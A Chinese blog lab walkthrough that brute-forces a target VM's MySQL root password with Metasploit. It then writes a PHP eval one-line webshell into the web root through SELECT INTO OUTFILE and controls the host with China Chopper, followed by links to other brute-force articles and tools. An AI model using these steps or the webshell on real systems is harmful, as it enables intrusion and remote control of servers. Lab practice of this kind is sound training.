利用MySQL暴力破解实现远程控制

最新推荐文章于 2025-02-05 17:06:54 发布
最新推荐文章于 2025-02-05 17:06:54 发布
阅读量2.1k 收藏 15
点赞数 2
文章标签: 学习 安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/xyc_0/article/details/129472446
版权

一、信息收集

利用nmap工具扫描靶机3306端口开启情况

nmap -sV 192.168.180.133 -p 3306

发现靶机开启3306端口,MySQL数据库

二、渗透测试

打开msfconsole渗透测试平台

搜索mysql_login漏洞模块

search mysql_login

使用auxiliary/scanner/mysql/mysql_login漏洞攻击模块

use 0

查看需要配置的参数

show options

设置密码字典

set pass_file /pass.txt

设置目标IP

set rhosts 192.168.180.133

设置爆破用户名

set username root

运行

exploit

成功爆破出密码 P@sswrd

三、远程登录

使用我们爆破出的用户名密码远程登录MySQL数据库

mysql -h 192.168.180.133 -u root -p

登录成功后写入一句话木马到/var/www目录中

select '<?php @eval($_POST[pass]);?>' into outfile '/var/www/shell.php';

写入成功后使用中国菜刀连接

双击进入

连接成功,可看到系统文件及信息

右击也可以打开虚拟终端,执行命令

实验结束

Attach_1
关注
暴力破解全攻略
悦分享
07-31 3869
1.压缩文件的暴力破解(zip,rar)。2.excel加密文件的破解。3.MSF对Metasploitable2-Linux的服务暴力破解。4.hydra工具暴力破解5.使用Medusa暴力破解。6.windows下3389,21,3306,5900爆破。7.PkavHTTPFuzzer1.5.6验证码破解。这是一款kali下的破解zip压缩包的工具。Step1开启kali终端,输入命令fcrackzip-h查看帮助文件。Step31.Step1例1。...
〖Python 数据库开发实战 - MySQL篇⑧〗- MySQL的配置文件与常用的配置方案
热门推荐
易编橙 · 终身成长社群,相遇已是上上签!
07-17 4万+
今天这一章节,我们来讲解一下 MySQL 的配置文件。既然开始写数据库的学习章节,就不能简单的讲一下 "增、删、改、查" ,再讲讲 "创建索引"、"回滚事务"等等。 学数据库就要学明白,毕竟将来是靠技术赚钱的。要学习明白怎么用,怎么配置,学懂学透彻了;当然了 MySQL 的配置有上百个,所以这里会挑选其中最重要的一些参数给大家介绍一下,其他的参数等到用到的时候再来介绍吧。...
phpMyAdmin(MySQL)暴力破解工具v1.3.rar
06-18
目前phpMyAdmin3.2.5,phpMyAdmin3.2.1、phpMyAdmin2.11.2版本测试均成功! 此工具仅供网友技术学习交流使用,请勿使用于非法用途。
10秒教会你mysql的连接
最新发布
m0_74823705的博客
02-05 617
按Enter键后,系统会提示您输入密码。输入密码(注意在输入密码时通常不会有任何显示)并按Enter键。:如果用户名和密码正确,您将看到MySQL的欢迎信息和提示符,如。:首先,打开您的计算机上的终端或命令提示符窗口。,表示已成功连接到MySQL数据库。替换为您的MySQL用户名。
mysql 暴力破解 root账号密码
weixin_30598225的博客
09-10 351
测试数据库的root账号密码大家都忘记了,好吧,那我们就暴力破解吧 1、找到my.cnf vi /etc/my.cnf在[mysqld]的段中加上一句:skip-grant-tables例如:[mysqld]datadir=/var/lib/mysqlsocket=/var/lib/mysql/mysql.sockskip-name-resolveskip-grant-tables保存并...
暴力破解MySQL账号密码
GuangPeng_Ding的博客
01-14 1082
例1: nmap --script=mysql-brute localhost -v 例2: nmap -p 3306 --script=mysql-brute.nse localhost
安鸾渗透实战平台——暴力破解(Mysql暴力破解 (200分)
weixin_50985113的博客
03-02 2511
漏洞环境 安鸾渗透实战平台——暴力破解(Mysql暴力破解) kali虚拟机 分析题目 1、从图上作者告诉我们要使用MySQL漏洞,最开始没明白是什么意思,去拿MSF的mysql爆破模块去测试了一下,得到密码,拿去使用时出现了问题 提示密码错误: 又试了几次发现每次爆破的密码都不一样 ...
Linux系统上安装MySQL远程访问配置
Welcome to Little__Sheep's blog !
05-02 767
今天花了一天的时间给Linux系统装MySQL,中途遇到了不少问题,导致重新开始了好几次,特此总结,以便复查。 首先说明一下环境,用的是VMware虚拟机搭载CentOS6.5的Linux系统,并用CRT远程控制,所用MySQL版本为mysql-5.7.23。 Linux系统所用的MySQL的下载在这里就不赘述了,重点是安装与配置。 在安装之前有必要先提一下,需要先在Linux上安装一些必要...
暴力破解攻击工具汇总——字典很关键,肉鸡也关键
weixin_30296405的博客
03-30 5224
lasercrack是一款爆力破解工具,ruby写的,现如今市面上常见的暴力工具如hydra,medusa都有着不错的破解效率。 破解RDP的软件也有很多,比如ncrack和Fast RDP Brute。 如果网页没有设置登录验证码,则很可能成为暴力破解工具攻击的目标,http://www.freebuf.com/column/169124.html,Nodejs暴力破解实践 web 登...
mysql5.7性能提升一百倍调优宝典
打造全国最全的AI Agent开发知识领域的博客
05-06 1万+
全文中一共有常用的(事实上你如果花1-2周阅读、理解、自己动手设一下后是需要这么多参数的)76个参数,我是按照: 每一个参数干吗? 在某些典型硬件配置下的db上参数该设多少? 设会怎么样? 不设会怎么样? 有什么坑如何填坑? 有些参数怎么算、算法又如何 这种style来写的,具体请看文档! 一千个DBA就有一千种配置方式! 大家一定记得不要轻易去看网上,要看只看官网!网上很多博客都...
mysql数据库暴破
04-08
该资源为python编写的mysql暴力破解软件,采用多线程编写,爆破速度非常快。
mysql破解工具
10-26
将该资源下载后,放置到navicat安装目录下,运行,选择navicat.exe。等待几秒后提示出patch successfully即可
SQL数据库密码暴力破解工具
01-18
SQL数据库密码暴力破解工具
mysql密码破解工具
10-01
mysql的密码破解工具,以及使用教程,mysql修改密码不再困难
Kali系统MSF模块暴力破解MySQL弱口令漏洞
ewii12567的博客
12-19 905
第一种是报网络安全专业,现在叫网络空间安全专业,主要专业课程:程序设计、计算机组成原理原理、数据结构、操作系统原理、数据库系统、 计算机网络、人工智能、自然语言处理、社会计算、网络安全法律法规、网络安全、内容安全、数字取证、机器学习,多媒体技术,信息检索、舆情分析等。内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…这里当登录用户发生变换不是root时, 需要配置。
Mysql数据库用户密码暴力破解
cloud952788的专栏
06-30 6897
声明: 破解数据库密码
Qt下载安装及配置教程(非常详细),从零基础入门到精通,看完这一篇就够了
Innocence_0的博客
08-19 4852
下载开源版往下滑,下载Qt在线安装程序它已经检测出我的是windows系统,直接点击download就好。如果是其它的系统,需要找到对应自己系统的安装包。然后跟网速有关,等一会就会自动下载等待下载完成,双击.exe文件,就可以进行安装。首先就是登录qt账户,如果没有可以自行注册一个。然后选择个人用户,之后点击下一步进行安装。如果没有报错,那继续往下:这一步是问你对qt有什么改善的建议,我这里直接选择没有,然后继续进行下一步。
怎么搭建mysql爆破靶场
01-07
### 设置和配置用于渗透测试的MySQL暴力破解练习环境 #### 配置目标机器上的MySQL服务器 为了创建一个适合进行安全测试或学习MySQL爆破靶场,需要先调整MySQL数据库的相关设置以便接受来自外部网络连接并降低某些安全性措施来模拟存在弱点的真实场景。 对于想要让PHPStudy中的MySQL服务支持远程访问的情况,在my.cnf文件中找到`bind-address=127.0.0.1`这一行,并将其改为`bind-address=0.0.0.0`以允许任何IP地址发起连接请求[^1]。另外还需确认防火墙规则已开放必要的端口(通常是3306),以及确保操作系统层面的安全策略不会阻止这种类型的通信尝试。 接着要处理的是账户权限管理方面的工作。由于Mysql的服务是以较高权限级别运行,默认情况下拥有root用户的完全控制权[^4],因此建议新建几个具有不同特权级别的测试专用账号供后续实验之用。这可以通过执行如下SQL命令实现: ```sql CREATE USER 'test_user'@'%' IDENTIFIED BY 'password'; GRANT ALL PRIVILEGES ON *.* TO 'test_user'@'%'; FLUSH PRIVILEGES; ``` 上述操作会建立名为`test_user`的新用户,并赋予其广泛的数据库操作许可范围。当然也可以根据实际需求定制更严格的授权方案。 #### 准备攻击工具与平台 考虑到实践过程中可能涉及到多种技术手段的应用,推荐采用像Kali Linux这样的专门针对信息安全领域优化过的Linux发行版作为工作平台。该系统内置了大量的网络安全评估软件包,其中包括Metasploit Framework (MSF),它能够方便快捷地加载各种辅助模块实施自动化字典攻击任务。 除了利用现成框架外,还可以考虑部署DVWA(Damn Vulnerable Web Application)[^2]这类专为教育目的设计的教学型应用程序。尽管主要面向Web应用层面上常见缺陷的研究,但其中也涵盖了部分关于认证机制绕过技巧的内容,有助于加深理解整个身份验证流程中存在的风险点及其防护对策。 最后值得注意的是,在正式开展任何形式的入侵演练之前,请务必获得合法授权并且严格限定活动边界以免造成不必要的损害或者触犯法律条款。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值